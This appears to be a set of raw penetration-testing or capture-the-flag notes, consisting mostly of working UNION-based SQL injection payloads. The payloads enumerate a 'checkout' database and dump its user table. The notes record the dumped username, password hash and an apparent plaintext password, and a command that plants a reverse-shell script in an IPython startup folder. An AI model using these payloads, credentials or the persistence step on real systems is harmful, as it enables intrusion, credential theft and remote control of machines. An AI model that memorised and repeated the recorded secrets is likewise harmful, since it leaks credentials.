timmy'union SELECT 1,group_concat(table_name, 0x0a),3 FROM information_schema.tables-- -
Find the current table name
timmy'union SELECT 1,concat(schema_name),3 FROM information_schema.schemata limit 1,1 -- -
Find the current table name
timmy'union SELECT 1,group_concat(schema_name),3 FROM information_schema.schemata -- -
Find the current table name
timmy'union SELECT 1,(select group_concat(schema_name) from information_schema.schemata),3 -- -
checkout
List all column names
{"timmy'union SELECT 4,group_concat(COLUMN_NAME),9999 from information_schema.columns -- -":"1"}
List all column names by table name
timmy'union SELECT 4,group_concat(COLUMN_NAME),9999 from information_schema.columns where table_schema like 'checkout'-- -
List the column names in the current table
timmy'union SELECT 1,(select group_concat(TABLE_NAME,':',COLUMN_NAME) from information_schema.columns where table_schema like 'checkout'),3 -- -
user:id,user:username,user:password
product:id,product:code,product:price
Dump the username and password contents of the user table
timmy'union SELECT 1,(select group_concat(username,password) from user),3 -- -
james_mason:fc895d4eddc2fc12f995e18c865cf273
Soleil101
mkdir -p -m 777 /opt/scripts_review/profile_default/startup && cp /tmp/reverse.py /opt/scripts_review/profile_default/startup/reverse.py && chmod +x /opt/scripts_review/profile_default/startup/reverse.py
AUTH F2WHqJUz2WEz=Gqq
sqlmap example using a saved request file: test only the UNION technique and specify that there are only three columns
sqlmap -r req --technique=U --union-col 3 --batch --dump
scp root@www.runoob.com:/home/root/others/music /home/space/music/1.mp3